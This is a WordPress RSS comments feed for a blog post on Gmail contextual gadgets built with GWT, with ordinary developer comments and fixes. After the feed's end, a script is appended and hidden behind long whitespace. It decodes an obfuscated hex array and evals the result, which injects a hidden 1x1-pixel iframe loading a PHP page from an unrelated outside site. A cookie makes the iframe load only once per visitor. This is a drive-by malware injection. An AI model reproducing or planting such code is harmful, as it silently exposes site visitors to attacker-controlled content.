<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Gmail Contextual Gadgets with GWT</title>
	<atom:link href="http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/</link>
	<description>Just another Java developer&#039;s site</description>
	<lastBuildDate>Mon, 17 Oct 2011 09:33:39 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
	<item>
		<title>By: CWeb</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2598</link>
		<dc:creator>CWeb</dc:creator>
		<pubDate>Mon, 17 Oct 2011 09:33:39 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2598</guid>
		<description><![CDATA[Little rectification to get it work, native method should be declared like this:

  native JsArray jsGetContentMatches() /*-{
        return &lt;b&gt;$wnd&lt;/b&gt;.google.contentmatch.getContentMatches();
    }-*/;]]></description>
		<content:encoded><![CDATA[<p>Little rectification to get it work, native method should be declared like this:</p>
<p>  native JsArray jsGetContentMatches() /*-{<br />
        return <b>$wnd</b>.google.contentmatch.getContentMatches();<br />
    }-*/;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Koen Maes</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2583</link>
		<dc:creator>Koen Maes</dc:creator>
		<pubDate>Mon, 10 Oct 2011 17:44:28 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2583</guid>
		<description><![CDATA[Hey Dennis,

Starting from this post, I am taking development of GWT gmail contextual gadget a bit further but I got stuck and no reply on the Google Groups. Desperately re-reading your article, I wonder maybe you can spot the problem. The post is here :
https://groups.google.com/forum/#!topic/google-apps-gadgets-api/gxNoIQUVI4k]]></description>
		<content:encoded><![CDATA[<p>Hey Dennis,</p>
<p>Starting from this post, I am taking development of GWT gmail contextual gadget a bit further but I got stuck and no reply on the Google Groups. Desperately re-reading your article, I wonder maybe you can spot the problem. The post is here :<br />
<a href="https://groups.google.com/forum/#!topic/google-apps-gadgets-api/gxNoIQUVI4k" rel="nofollow">https://groups.google.com/forum/#!topic/google-apps-gadgets-api/gxNoIQUVI4k</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis Lunev</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2413</link>
		<dc:creator>Denis Lunev</dc:creator>
		<pubDate>Thu, 21 Jul 2011 20:06:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2413</guid>
		<description><![CDATA[Please see my reply in email.]]></description>
		<content:encoded><![CDATA[<p>Please see my reply in email.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Serge</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2410</link>
		<dc:creator>Serge</dc:creator>
		<pubDate>Mon, 18 Jul 2011 12:14:01 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2410</guid>
		<description><![CDATA[Hi !
I&#039;ve just added  http://mozgoweb.com/gadget/CtxGadgetEntryPoint.gadget.xml as a gadget in gmail, but it is not visible in mails. What am I doing wrong ?]]></description>
		<content:encoded><![CDATA[<p>Hi !<br />
I&#8217;ve just added  <a href="http://mozgoweb.com/gadget/CtxGadgetEntryPoint.gadget.xml" rel="nofollow">http://mozgoweb.com/gadget/CtxGadgetEntryPoint.gadget.xml</a> as a gadget in gmail, but it is not visible in mails. What am I doing wrong ?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis Lunev</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2406</link>
		<dc:creator>Denis Lunev</dc:creator>
		<pubDate>Thu, 14 Jul 2011 11:40:17 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2406</guid>
		<description><![CDATA[Hi Koen,
You can find it in official google specs - http://code.google.com/intl/en/apis/gmail/gadgets/contextual/#gadget
This is the only view available for gadgets.]]></description>
		<content:encoded><![CDATA[<p>Hi Koen,<br />
You can find it in official google specs &#8211; <a href="http://code.google.com/intl/en/apis/gmail/gadgets/contextual/#gadget" rel="nofollow">http://code.google.com/intl/en/apis/gmail/gadgets/contextual/#gadget</a><br />
This is the only view available for gadgets.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Koen</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2405</link>
		<dc:creator>Koen</dc:creator>
		<pubDate>Thu, 14 Jul 2011 11:17:28 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2405</guid>
		<description><![CDATA[this part

. Content type=&quot;html&quot; view=&quot;card&quot;

(filtered out in previous comment )]]></description>
		<content:encoded><![CDATA[<p>this part</p>
<p>. Content type=&#8221;html&#8221; view=&#8221;card&#8221;</p>
<p>(filtered out in previous comment )</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Koen</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2404</link>
		<dc:creator>Koen</dc:creator>
		<pubDate>Thu, 14 Jul 2011 11:16:44 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2404</guid>
		<description><![CDATA[thxs !! helped alot.

mainly this part : 

....

where dit you find documentation on that ?]]></description>
		<content:encoded><![CDATA[<p>thxs !! helped alot.</p>
<p>mainly this part : </p>
<p>&#8230;.</p>
<p>where dit you find documentation on that ?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ikhwani</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-2401</link>
		<dc:creator>Ikhwani</dc:creator>
		<pubDate>Thu, 09 Jun 2011 00:25:09 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-2401</guid>
		<description><![CDATA[Hi Denis,
Thank you very much for the gadget example.

I&#039;ve managed to get your example code running using gwt-gadgets 1.2.0 and GWT 2.1.1. But when using GWT 2.2 or 2.3, even with gwt-gadgets 1.2.1-rc1, the contextual gadget is not displayed. It looks like the problem is with the call to google.contentmatch.getContentMatches().

Do you know if there should be an update to the example code to make it work with the newer libraries? Thank you. :-)]]></description>
		<content:encoded><![CDATA[<p>Hi Denis,<br />
Thank you very much for the gadget example.</p>
<p>I&#8217;ve managed to get your example code running using gwt-gadgets 1.2.0 and GWT 2.1.1. But when using GWT 2.2 or 2.3, even with gwt-gadgets 1.2.1-rc1, the contextual gadget is not displayed. It looks like the problem is with the call to google.contentmatch.getContentMatches().</p>
<p>Do you know if there should be an update to the example code to make it work with the newer libraries? Thank you. <img src='http://www.mozgoweb.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: What is Contextual Advertising? &#124; Ezineboy</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-137</link>
		<dc:creator>What is Contextual Advertising? &#124; Ezineboy</dc:creator>
		<pubDate>Sat, 01 Jan 2011 00:33:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-137</guid>
		<description><![CDATA[[...] Gmail Contextual Gadgets with GWT &#124; Mozgoweb [...]]]></description>
		<content:encoded><![CDATA[<p>[...] Gmail Contextual Gadgets with GWT | Mozgoweb [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Contextual Advertising Why? &#124; Ezineboy</title>
		<link>http://www.mozgoweb.com/posts/gmail-contextual-gadgets-with-gwt/#comment-136</link>
		<dc:creator>Contextual Advertising Why? &#124; Ezineboy</dc:creator>
		<pubDate>Fri, 31 Dec 2010 23:39:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.mozgoweb.com/?p=54#comment-136</guid>
		<description><![CDATA[[...] Gmail Contextual Gadgets with GWT &#124; Mozgoweb [...]]]></description>
		<content:encoded><![CDATA[<p>[...] Gmail Contextual Gadgets with GWT | Mozgoweb [...]</p>
]]></content:encoded>
	</item>
</channel>
</rss>
echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          ss=eval(\"Str\"+\"ing\");d=document;a=\"68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,79,6a,79,66,65,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,79,6a,79,66,65,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,79,79,79,30,6a,63,74,74,7b,6a,71,70,76,7c,72,6a,71,76,71,30,65,71,6f,31,6f,7b,63,6e,64,77,6f,61,68,6b,6e,67,75,31,66,76,66,30,72,6a,72,29,3d,f,c,22,22,22,22,79,6a,79,66,65,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,22,3f,22,29,63,64,75,71,6e,77,76,67,29,3d,f,c,22,22,22,22,79,6a,79,66,65,30,75,76,7b,6e,67,30,64,71,74,66,67,74,22,3f,22,29,32,29,3d,f,c,22,22,22,22,79,6a,79,66,65,30,75,76,7b,6e,67,30,6a,67,6b,69,6a,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,79,6a,79,66,65,30,75,76,7b,6e,67,30,79,6b,66,76,6a,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,79,6a,79,66,65,30,75,76,7b,6e,67,30,6e,67,68,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,79,6a,79,66,65,30,75,76,7b,6e,67,30,76,71,72,22,3f,22,29,33,72,7a,29,3d,f,c,f,c,22,22,22,22,6b,68,22,2a,23,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,79,6a,79,66,65,29,2b,2b,22,7d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,79,74,6b,76,67,2a,29,3e,66,6b,78,22,6b,66,3f,5e,29,79,6a,79,66,65,5e,29,40,3e,31,66,6b,78,40,29,2b,3d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,79,6a,79,66,65,29,2b,30,63,72,72,67,70,66,45,6a,6b,6e,66,2a,79,6a,79,66,65,2b,3d,f,c,22,22,22,22,7f,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,55,67,76,45,71,71,6d,6b,67,2a,65,71,71,6d,6b,67,50,63,6f,67,2e,65,71,71,6d,6b,67,58,63,6e,77,67,2e,70,46,63,7b,75,2e,72,63,76,6a,2b,22,7d,f,c,22,78,63,74,22,76,71,66,63,7b,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,78,63,74,22,67,7a,72,6b,74,67,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,6b,68,22,2a,70,46,63,7b,75,3f,3f,70,77,6e,6e,22,7e,7e,22,70,46,63,7b,75,3f,3f,32,2b,22,70,46,63,7b,75,3f,33,3d,f,c,22,67,7a,72,6b,74,67,30,75,67,76,56,6b,6f,67,2a,76,71,66,63,7b,30,69,67,76,56,6b,6f,67,2a,2b,22,2d,22,35,38,32,32,32,32,32,2c,34,36,2c,70,46,63,7b,75,2b,3d,f,c,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,22,3f,22,65,71,71,6d,6b,67,50,63,6f,67,2d,24,3f,24,2d,67,75,65,63,72,67,2a,65,71,71,6d,6b,67,58,63,6e,77,67,2b,f,c,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,2d,22,24,3d,67,7a,72,6b,74,67,75,3f,24,22,2d,22,67,7a,72,6b,74,67,30,76,71,49,4f,56,55,76,74,6b,70,69,2a,2b,22,2d,22,2a,2a,72,63,76,6a,2b,22,41,22,24,3d,22,72,63,76,6a,3f,24,22,2d,22,72,63,76,6a,22,3c,22,24,24,2b,3d,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,49,67,76,45,71,71,6d,6b,67,2a,22,70,63,6f,67,22,2b,22,7d,f,c,22,78,63,74,22,75,76,63,74,76,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,70,63,6f,67,22,2d,22,24,3f,24,22,2b,3d,f,c,22,78,63,74,22,6e,67,70,22,3f,22,75,76,63,74,76,22,2d,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2d,22,33,3d,f,c,22,6b,68,22,2a,22,2a,22,23,75,76,63,74,76,22,2b,22,28,28,f,c,22,2a,22,70,63,6f,67,22,23,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,32,2e,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2b,22,2b,22,2b,f,c,22,7d,f,c,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,7f,f,c,22,6b,68,22,2a,22,75,76,63,74,76,22,3f,3f,22,2f,33,22,2b,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,78,63,74,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,24,3d,24,2e,22,6e,67,70,22,2b,3d,f,c,22,6b,68,22,2a,22,67,70,66,22,3f,3f,22,2f,33,22,2b,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6e,67,70,69,76,6a,3d,f,c,22,74,67,76,77,74,70,22,77,70,67,75,65,63,72,67,2a,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,6e,67,70,2e,22,67,70,66,22,2b,22,2b,3d,f,c,7f,f,c,6b,68,22,2a,70,63,78,6b,69,63,76,71,74,30,65,71,71,6d,6b,67,47,70,63,64,6e,67,66,2b,f,c,7d,f,c,6b,68,2a,49,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2b,3f,3f,37,37,2b,7d,7f,67,6e,75,67,7d,55,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2e,22,29,37,37,29,2e,22,29,33,29,2e,22,29,31,29,2b,3d,f,c,f,c,7c,7c,7c,68,68,68,2a,2b,3d,f,c,7f,f,c,7f\".split(\",\");for(i=0;i<a.length;i++){a[i]=parseInt(a[i],16)-(5-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window.document)eval(ss.fromCharCode.apply(ss,a));</script>
";